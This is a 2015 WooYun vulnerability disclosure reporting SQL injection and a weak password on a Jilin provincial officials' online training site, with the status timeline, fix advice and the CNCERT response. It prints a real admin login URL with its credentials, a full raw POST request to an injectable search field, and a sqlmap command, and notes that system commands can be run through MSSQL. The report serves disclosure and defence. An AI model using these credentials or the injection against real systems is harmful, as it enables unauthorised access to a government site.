当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107875

漏洞标题:吉林省领导干部网络培训学苑存在SQL注入漏洞和弱口令

相关厂商:吉林省委组织部

漏洞作者: 路人甲

提交时间:2015-04-16 14:40

修复时间:2015-06-05 11:48

公开时间:2015-06-05 11:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-16: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

成功控制该系统后可修改网络学习内容和进行考试作弊,且主站的宣传功能可用于发布虚假反动或者钓鱼信息

详细说明:

吉林省领导干部网络培训学苑存在SQL注入漏洞和弱口令

漏洞证明:

弱口令

www.jlgbjy.cn/Admin/flogin.aspx?id=18


songyuan/123456


2015-04-14 16:05:21的屏幕截图.png


SQL注入漏洞
注:不需要登录即可注入
注入点出现在后台搜索处
POST数据如下

POST /Admin/findextpeople.aspx?id=18 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.jlgbjy.cn/Admin/findextpeople.aspx?id=18
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 2706
DNT: 1
Host: www.jlgbjy.cn
Pragma: no-cache
Cookie: ASP.NET_SessionId=pdowq3ndyc1yxnbuwjquiivg
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE0MTA2OTc1MzQPZBYCAgMPZBYSAgEPEA8WBh4NRGF0YVRleHRGaWVsZAUJZHNvcnRuYW1lHg5EYXRhVmFsdWVGaWVsZAUHZHNvcnRpZB4LXyFEYXRhQm91bmRnZBAVBwbnnIHnm7QG5biC5beeBumrmOagoQbkvIHkuJoDVklQCeiBlOe7nOWRmAzmnb7ljp%2FliIbpmaIVBwIxMQIxMgIxMwIxNQIxNgIxNwIxOBQrAwdnZ2dnZ2dnFgECBmQCBQ8QDxYGHwAFCnBzb3J0MW5hbWUfAQUIcHNvcnQxaWQfAmdkEBUGBuWFqOmDqAbnnIHnuqcG5Y6F57qnBuWkhOe6pwbluIjnuqcJ5peg57qn5YirFQYCMDACMTECMTICMTMCMTQCMjAUKwMGZ2dnZ2dnFgFmZAIHDxBkEBUBBuWFqOmDqBUBAjAwFCsDAWcWAWZkAgkPEGRkFgFmZAILDxAPFgYfAAUGcG1uYW1lHwEFBHBtaWQfAmdkEBU5BuWFqOmDqAbmsYnml48J6JKZ5Y%2Bk5pePBuWbnuaXjwbol4%2Fml48M57u05ZC%2B5bCU5pePBuiLl%2BaXjwblvZ3ml48G5aOu5pePCeW4g%2BS%2BneaXjwnmnJ3pspzml48G5ruh5pePBuS%2Bl%2BaXjwbnkbbml48G55m95pePCeWcn%2BWutuaXjwnlk4jlsLzml48M5ZOI6JCo5YWL5pePBuWCo%2BaXjwbpu47ml48J5YKI5YKI5pePBuS9pOaXjwbnlbLml48J6auY5bGx5pePCeaLieelnOaXjwbmsLTml48J5Lic5Lmh5pePCee6s%2Bilv%2BaXjwnmma%2Fpoofml48P5p%2Bv5bCU5YWL5a2c5pePBuWcn%2BaXjwzovr7mlqHlsJTml48J5Lur5L2s5pePBue%2BjOaXjwnluIPmnJfml48J5pKS5ouJ5pePCeavm%2BWNl%2BaXjwnku6Hkvazml48J6ZSh5Lyv5pePCemYv%2BaYjOaXjwnmma7nsbPml48M5aGU5ZCJ5YWL5pePBuaAkuaXjw%2FkuYzlhbnliKvlhYvml48M5L%2BE572X5pav5pePDOmEgua4qeWFi%2BaXjwnlvrfmmILml48J5L%2Bd5a6J5pePCeijleWbuuaXjwbkuqzml48M5aGU5aGU5bCU5pePCeeLrOm%2BmeaXjwzphILkvKbmmKXml48J6LWr5ZOy5pePCemXqOW3tOaXjwnnj57lt7Tml48J5Z%2B66K%2B65pePFTkCMDACMDECMDICMDMCMDQCMDUCMDYCMDcCMDgCMDkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMTkCMjACMjECMjICMjMCMjQCMjUCMjYCMjcCMjgCMjkCMzACMzECMzICMzMCMzQCMzUCMzYCMzcCMzgCMzkCNDACNDECNDICNDMCNDQCNDUCNDYCNDcCNDgCNDkCNTACNTECNTICNTMCNTQCNTUCNTYUKwM5Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnFgFmZAINDxAPFgYfAAUGcHBuYW1lHwEFBHBwaWQfAmdkEBULBuWFqOmDqAnlhbHkuqflhZoe5Lit5Zu95Zu95rCR5YWa6Z2p5ZG95aeU5ZGY5LyaEuS4reWbveawkeS4u%2BWQjOebnxXkuK3lm73msJHkuLvlu7rlm73kvJoV5Lit5Zu95rCR5Li75L%2BD6L%2Bb5LyaFeS4reWbveWGnOW3peawkeS4u%2BWFmg%2FkuK3lm73oh7TlhazlhZoM5Lmd5LiJ5a2m56S%2BGOWPsOa5vuawkeS4u%2BiHquayu%2BWQjOebnwnml6DlhZrmtL4VCwIwMAIxMQIxMgIxMwIxNAIxNQIxNgIxNwIxOAIxOQIyMBQrAwtnZ2dnZ2dnZ2dnZxYBZmQCDw8QZGQWAWZkAhUPFgIeC18hSXRlbUNvdW50AgEWAgIBD2QWBGYPFQsBMQnokaPkuL3nqIsJ6JGj5Li956iLA%2BWlswI0MhLmsJHlu7rmnb7ljp%2FluILlp5QG5Ymv5aSEGOawkeW7uuadvuWOn%2BW4guWJr%2BS4u%2BWnlBXkuK3lm73msJHkuLvlu7rlm73kvJoG5rGJ5pePCDIwMTUtNC05ZAIBDw8WAh4PQ29tbWFuZEFyZ3VtZW50BQwxODAwOTMwMDAwMDFkZAIXDw8WBh4LUmVjb3JkY291bnQCAR4QQ3VycmVudFBhZ2VJbmRleAIBHghQYWdlU2l6ZQIUZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFHFJlcGVhdGVyMSRjdGwwMSRJbWFnZUJ1dHRvbjE4HQ6KjXZkWTCGhtS59Afng%2BavjQ%3D%3D&__VIEWSTATEGENERATOR=EC8D21FC&txtDeptName=%C3%F1%BD%A8%CB%C9%D4%AD%CA%D0%CE%AF&ddl_jb=00&ddl_jb2=00&ddl_sex=00&ddl_mz=00&ddl_dp=00&ddl_age=00&btnSelect=%B2%E9%D1%AF


SQLmap注入参数

sqlmap -r /root/sy -p"txtDeptName" --level=5 --dbs


结果如下

2015-04-14 16:07:52的屏幕截图.png


数据库为MSSQL可以进行xpcmd执行系统命令

修复方案:

修改口令使其符合复杂度要求
对输入和输出进行过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-21 11:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给吉林分中心,由其后续协调网站管理单位处置。

最新状态:

暂无